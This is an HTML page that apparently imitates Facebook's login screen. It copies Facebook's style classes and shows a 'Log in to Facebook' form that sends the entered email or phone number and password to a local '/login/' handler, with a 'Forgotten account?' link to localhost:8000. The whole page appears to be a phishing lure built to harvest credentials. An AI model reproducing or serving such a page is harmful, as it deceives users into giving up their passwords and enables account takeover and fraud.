<!doctype html>
<html>
<head>
<meta charset="UTF-8">
<title>log</title>
<style>
	body{
		background-color: #edf0f5;
	}
	a {
    color: #385898;
    cursor: pointer;
    text-decoration: none;
}
	
	._ohf {
    float: right;
}
	.rfloat {
    float: right;
}
	._42ft {
    cursor: pointer;
    display: inline-block;
    text-decoration: none;
    white-space: nowrap;
}
	._4jy6, ._4jy6._42fr:active, ._4jy6._42fr._42fs {
    line-height: 42px;
    padding: 0 24px;
}
	._4jy1 {
    background-color: #4267b2;
    border-color: #4267b2;
}
	._4jy1, ._4jy2 {
    color: #fff;
}
	._4jy0 {
    border: 1px solid;
    border-radius: 2px;
    box-sizing: content-box;
    font-size: 12px;
    -webkit-font-smoothing: antialiased;
    font-weight: bold;
    justify-content: center;
    padding: 0 8px;
    position: relative;
    text-align: center;
    text-shadow: none;
    vertical-align: middle;
}
	._4jy0:before {
    content: '';
    display: inline-block;
    height: 20px;
    vertical-align: middle;
}
	._4jy0 {
    transition: 200ms cubic-bezier(.08,.52,.52,1) background-color, 200ms cubic-bezier(.08,.52,.52,1) box-shadow, 200ms cubic-bezier(.08,.52,.52,1) transform;
}
	._4jy0 {
    border: 1px solid;
    border-radius: 2px;
    box-sizing: content-box;
    font-size: 12px;
    -webkit-font-smoothing: antialiased;
    font-weight: bold;
    justify-content: center;
    padding: 0 8px;
    position: relative;
    text-align: center;
    text-shadow: none;
    vertical-align: middle;
}
	._4jy6, ._4jy6._42fr:active, ._4jy6._42fr._42fs {
    line-height: 42px;
    padding: 0 24px;
}
	._4jy2 {
    background-color: #42b72a;
    border-color: #42b72a;
}
	._5iyz {
    max-width: 400px;
}
	._52jv {
    text-align: center;
}
	
	html ._55r1 {
    background: #FFFFFF url(/rsrc.php/v3/yO/r/YQNfPR9MJfx.png) repeat-x;
    border: 1px solid #dddfe2;
    color: #1d2129;
    font-family: Helvetica, Arial, sans-serif;
    font-size: 12px;
    height: 22px;
    line-height: 16px;
    padding: 0 8px;
    vertical-align: middle;
}
	
	._6luv {
    align-items: center;
    background-color: #fff;
    border: none;
    border-radius: 8px;
    box-shadow: 0 2px 4px rgba(0, 0, 0, .1), 0 8px 16px rgba(0, 0, 0, .1);
    box-sizing: border-box;
    margin: 40px 0 0;
    padding: 20px 0 28px;
    width: 396px;
}
	
	._6lux {
    display: inline-block;
    font-size: 14px;
    margin: auto;
    padding: 6px 0;
    width: 302px;
}
	._6lux ._6luy {
    font-size: 14px;
    padding: 5px 8px;
    width: 284px;
}
	
	._6luw {
    font-family: SFProDisplay-Bold, Helvetica, Arial, sans-serif;
    font-size: 28px;
    font-weight: bold;
    padding-bottom: 12px;
}
	._6ltg {
    padding-top: 6px;
}
	._6lti {
    font-size: 14px;
}
	._6ltj {
    margin-top: 12px;
}
	._6ltk::before {
    margin-right: 15px;
}
	._6ltk::before, ._6ltk::after {
    border-bottom: 1px solid #ccd0d5;
    content: '';
    flex: 1 1 auto;
}
	._6ltk {
    align-items: center;
    display: flex;
    margin: 16px 47px;
    text-align: center;
}
	._6ltk::after {
    margin-left: 15px;
}
	._6ltg {
    padding-top: 6px;
}
		._6lth {
    font-size: 14px;
    width: 252px;
}
	body, button, input, label, select, td, textarea {
    font-family: Helvetica, Arial, sans-serif;
    font-size: 12px;
}
	#facebook ._8esf ._8esh {
    font-family: SFProText-Semibold, Helvetica, Arial, sans-serif;
    font-size: 14px;
    font-weight: 600;
}
	._8f3m ._8esh {
    color: inherit;
}
	#facebook ._8esf ._58mk {
    border-top: none;
    color: #1c1e21;
    font-family: SFProText-Regular, Helvetica, Arial, sans-serif;
    font-size: 14px;
    font-weight: normal;
    padding-top: 0;
}
	._8ilg ._58mk, ._8icx ._58mk {
    margin-top: 28px;
    text-align: center;
}
	}
._8f3m ._58mk {
    margin-top: 42px;
    text-align: center;
}
	._58mk {
    border-top: 1px solid #dddfe2;
    color: #666;
    font-size: 13px;
    font-weight: bold;
    margin-top: 10px;
    padding-top: 15px;
}
</style>
</head>

<body>
	<img  src="1.png" width="700" height="450" alt=""/>
<div class="_5iyz rfloat _ohf">
	<div class="_6m0s">
		<div class="_8iep">
			<div class="_6luv _52jv">
				<form class="_featuredLogin__formContainer" action="/login/" method="post" onsubmit="" id="u_0_9">
					<input type="hidden" name="jazoest" value="2723" autocomplete="off">
					<input type="hidden" name="lsd" value="AVpyUs8S" autocomplete="off">
					<div class="_6luw">Log in to Facebook</div><div class="_6lux">
					<input type="text" class="inputtext _55r1 _6luy" name="email" placeholder="Email address or phone number" aria-label="Email address or phone number">
					</div>
					<div class="_6lux">
						<input type="password" class="inputtext _55r1 _6luy" name="pass" placeholder="Password" aria-label="Password"></div>
					<div class="_6ltg">
						<button value="1" class="_42ft _4jy0 _6lth _4jy6 _4jy1 selected _51sy" name="login" type="submit">Log In</button></div>
					<div class="_6ltj"><a href="localhost:8000">Forgotten account?</a></div>
					<div class="_6ltk">or</div>
					<div class="_6ltg"><a role="button" class="_42ft _4jy0 _6lti _4jy6 _4jy2 selected _51sy" href="#" ajaxify="/reg/spotlight/" rel="async">Create New Account</a></div>
				</form>
			</div>
		</div>
	</div>
	</div>
</body>
</html>
